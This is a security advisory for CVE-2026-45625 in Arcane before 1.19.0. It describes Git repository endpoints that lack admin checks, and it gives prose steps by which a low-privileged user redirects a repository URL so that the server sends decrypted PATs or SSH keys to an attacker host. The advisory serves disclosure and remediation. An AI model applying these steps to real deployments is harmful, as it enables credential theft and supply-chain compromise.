CVE-2026-45625

Name of the Vulnerable Software and Affected Versions Arcane versions prior to 1.19.0

Description Arcane improperly exposes Git repository management endpoints to any authenticated user, allowing low-privileged accounts to modify repository configurations, exfiltrate stored Git credentials, access private repository contents, and tamper with GitOps deployments. The issue stems from the huma-based REST API failing to call the checkAdmin(ctx) helper function on eight of nine endpoints under '/api/customize/git-repositories' and '/api/git-repositories/sync'. While the authentication middleware verifies the user is logged in, it does not enforce the admin role for these specific handlers.

An attacker with the default user role can use the UpdateRepository function to change a repository's URL to a host they control while preserving the encrypted credentials. By subsequently calling the '/test', '/branches', or '/files' endpoints, the system decrypts the legitimate Personal Access Token (PAT) or SSH key and transmits it to the attacker's host via HTTP Basic auth or SSH auth. This allows for the cleartext exfiltration of credentials, potential supply-chain compromise by swapping repository URLs to malicious forks, and denial of service by deleting production configurations.

Recommendations Update to version 1.19.0. As a temporary workaround, restrict access to the '/api/customize/git-repositories' and '/api/git-repositories/sync' endpoints to trusted network ranges or disable them if not required.